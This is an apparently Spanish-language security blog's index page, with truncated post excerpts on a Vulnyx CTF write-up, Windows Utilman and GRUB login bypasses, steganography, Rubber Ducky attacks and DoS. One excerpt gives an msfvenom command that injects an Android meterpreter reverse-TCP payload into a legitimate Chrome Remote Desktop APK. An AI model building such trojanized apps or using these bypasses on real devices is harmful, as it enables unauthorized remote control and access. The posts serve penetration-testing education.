Entradas

Mostrando entradas de julio, 2025

Write-up: Máquina Shop (Vulnyx)

Imagen
Comenzamos con averiguar la dirección IP de la Máquina Víctima, para ello primeramente utilizaremos la herramienta netdiscover , para ello ejecutamos el siguiente comando: $ netdiscover -i eth1 -r 10.0.2.0/24 Kali (Máquina Atacante): 10.0.2.4 Máquina Víctima: 10.0.2.5 Comprobamos si tenemos conexión con la Máquina Víctima, para ello ejecutamos el siguiente comando: $ ping -c 1 10.0.2.5 Como se puede comprobar por el TTL nos enfrentamos a una Máquina Linux . A continuación realizamos con la herramienta nmap un reconocimiento de los servicios, para ello ejecutamos el siguiente comando: $ nmap -Pn  -p-  10.0.2.5 -sVC Como podemos comprobar la Máquina Víctima tiene abiertos los puertos  22 y 80 . Comprobamos que es lo que corre en el puerto 80. A continuación, realizamos con la herramienta FFUF un fuzzing web, para ello ejecutamos el siguiente comando: $ ffuz -u http://10.0.2.5:80/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt Encontramos ...

Prueba de Concepto: Creación de una APK Maliciosa a partir de una APK Legitima (Android)

Imagen
Los dispositivos móviles se han convertido en elementos indispensables, tanto en el ámbito personal como en el profesional, su uso ha alcanzado un gran nivel desplazando a los ordenadores como herramienta informática en muchos entornos, y resulta muy difícil imaginar la realización de las actividades cotidianas sin hacer uso de estos. La utilización permanente y extensiva de estas tecnologías ha convertido a los dispositivos móviles en uno de los objetivos principales de los ciberataques en los últimos años. Por lo que en esta ocasión vamos a crear un payload dentro de una APK legitima y establecer una sesión meterpreter en metasploit . Primeramente nos descargamos la APK legítima desde apkmirror , por ejemplo la de Chrome Remote Desktop . Pasamos la Apk legítima por la herramienta msfvenom , para ello ejecutaremos el siguiente comando: $ msfvenom -x chromeremotedesktop.apk -p android/meterpreter/reverse_tcp LHOST=192.168.1.157 LPORT= 4444 -o chromeremotedesktop_virus.apk Ahora con met...

Prueba de Concepto: Bypass Login en Windows

Imagen
El archivo ejecutable " Utilman.exe " es una utilidad de Windows diseñada para dar accesibilidad y facilidad de uso a través de diferentes herramientas de accesibilidad, como el Narrador, el Teclado en Pantalla, el Lupa, entre otros, especialmente útiles para personas con discapacidades visuales o de movilidad. El ataque de " bypass " de login de Windows utilizando Utilman.exe es una  técnica que aprovecha una vulnerabilidad en el sistema operativo. Implica  reemplazar el ejecutable Utilman.exe ,  con otro programa, como cmd.exe . Cuando se activa Utilman.exe desde la pantalla de inicio de sesión  (presionando Windows + U), en lugar de abrir la utilidad de accesibilidad, se  ejecuta el programa malicioso (por ejemplo, cmd.exe). Esto permite al  atacante obtener acceso al Símbolo del sistema con privilegios de  administrador sin necesidad de autenticarse, lo que les da control sobre el  sistema y la capacidad de realizar cambios o comprom...

Prueba de Concepto: Saltando el Login desde el Grub en Linux

Imagen
El " bypass " del login mediante el GRUB implica acceder a un sistema Linux sin pasar por el proceso habitual de inicio de sesión. Esto se logra mediante la manipulación del cargador de arranque GRUB, que es responsable de iniciar el sistema operativo. Al realizar ciertos cambios en la configuración del GRUB, se puede ingresar directamente al sistema sin requerir credenciales de inicio de sesión, lo cual puede representar un riesgo de seguridad si no se protege adecuadamente. Para ello, lo que haremos será modificar unas líneas en el grub para que en lugar de realizar un arranque convencional, se ejecute una Shell con los privilegios de un super usuario. Primero encienda la máquina y espere hasta que muestre el cargador de arranque grub pantalla. Para abrir la terminal de grub, debemos pulsar la tecla e en la pantalla de selección de OS a arrancar. Aqui tenemos que hacer algunos cambios, primero tenemos que hacer es cambiar la " ro " que significa leer solo por ...

Fundamentos de Programación

Imagen
En un mundo que ha sufrido un importante proceso de transformación digital cada vez hay más aplicativos desarrollados con el fin de interactuar con los seres humanos, si estos aplicativos no están correctamente programados un atacante puede hacer uso mal intencionado del software y controlar el flujo de ejecución, pudiendo alterar la información y/o robarla. Antes de nada, haremos una distinción fundamental entre hardware y software Hardware:  Todos los componentes físicos de un ordenador. Software:  Programas e instrucciones para ejecutar tareas en un ordenador. Una vez tenemos claro la diferencia, en esta entrada de este blog nos centraremos en el software, y en una de sus unidades fundamentales: Los Programas. Definiríamos programa como: Secuencia de instrucciones. Entendible por el ordenador. Tienen un objetivo o tarea concreta. Los ordenadores son máquinas eléctricas que sólo entienden de 0 y 1, siendo: 0 no hay corriente. 1 hay corriente. Este es el único lenguaje que e...

Esteganografía: Ocultar y Descubrir Información con Steghide, Foremost, Binwalk y Strings

La esteganografía es una técnica utilizada para ocultar información dentro de los archivos aparentemente inofensivos como imágenes , audios o documentos . En el hacking ético , analizar estos archivos es una práctica habitual para detectar posibles fugas de datos, cargas maliciosas, etc... Las herramientas clave para detectar información oculta son: Steghide Es una herramienta muy utilizada en esteganografía que permite ocultar y extraer datos en archivos portadores de imágenes ( JPEG, BMP ) y audios ( WAV, AU ). $ steghide [opciones] Las opciones principales de steghide son: --help:  Muestra la ayuda. embed: Oculta un archivo dentro de otro (imagen o audio). extract: Extrae un archivo oculto dentro de otro. info: Muestra información del archivo portador (si contiene datos ocultos, método, etc...). --encrypt, --compress: Habilita o desactiva cifrado o compresión (por defecto: cifrado activado, comprensión activada). -cf: Archivo portador (cover file). -ef: Archivo a ocultar ...

Vectores de Ataques Fisicos

Imagen
La intrusión física es una parte vital de los ejercicios de red teaming en ciberseguridad debido a varias razones, principalmente porque proporciona una evaluación realista de la postura de seguridad de una organización en su totalidad, no sólo en términos de seguridad cibernética, sino también de seguridad física. USB Rubber Ducky Un Rubber Ducky es un dispositivo que parece un USB común pero es, de hecho, un teclado automatizado. Cuando se inserta en una computadora, el sistema lo reconoce como un teclado humano (HID, por sus siglas en inglés) y el dispositivo ejecuta cargas útiles preprogramadas que pueden incluir la introducción rápida de comandos de teclado para ejecutar acciones maliciosas. Algunas posibilidades con un Rubber Ducky incluyen: Instalación de Malware: Instalar software malicioso en el sistema comprometido. Exfiltración de Datos: Crear y transferir archivos con información sensible. Creación de Backdoors: Generar accesos traseros para permitir el acceso remoto a...

Ataque de Denegación de Servicio (DoS/DDoS)

Se denomina ataque de denegación de servicio (DoS) a realizar peticiones continuas, a través de la red, con el fin de saturar sus recursos y sobrecargar el sistema objetivo; consiguiendo que se vea afectado su normal funcionamiento o se detenga tanto el servicio como el sistema base que lo sustenta. Un objetivo, por su visibilidad, son los servidores web. Para que un ataque DoS se convierta en distribuido (DDoS), el atacante utiliza múltiples fuentes de vulnerabilidad u otras fuentes bajo su control que generan el ataque (botnet). Habitualmente, los ataques DDoS son segregados según la capa del modelo OSI que atacan. los mas comunes son: Capa 3 (Red): Paquetes, Determinación de la ruta y direccionamiento lógico, Ataques de reflexión UDP. Capa 4 (Transporte): Segmentos, Conexiones integrales y confiabilidad, Inundaciones SYN. Capa 6 (Presentación): Datos, Representación de datos y cifrado, Abuso de SSL. Capa 7 (Aplicación): Datos, Procesamiento de red para la aplicación, Inundaciones HT...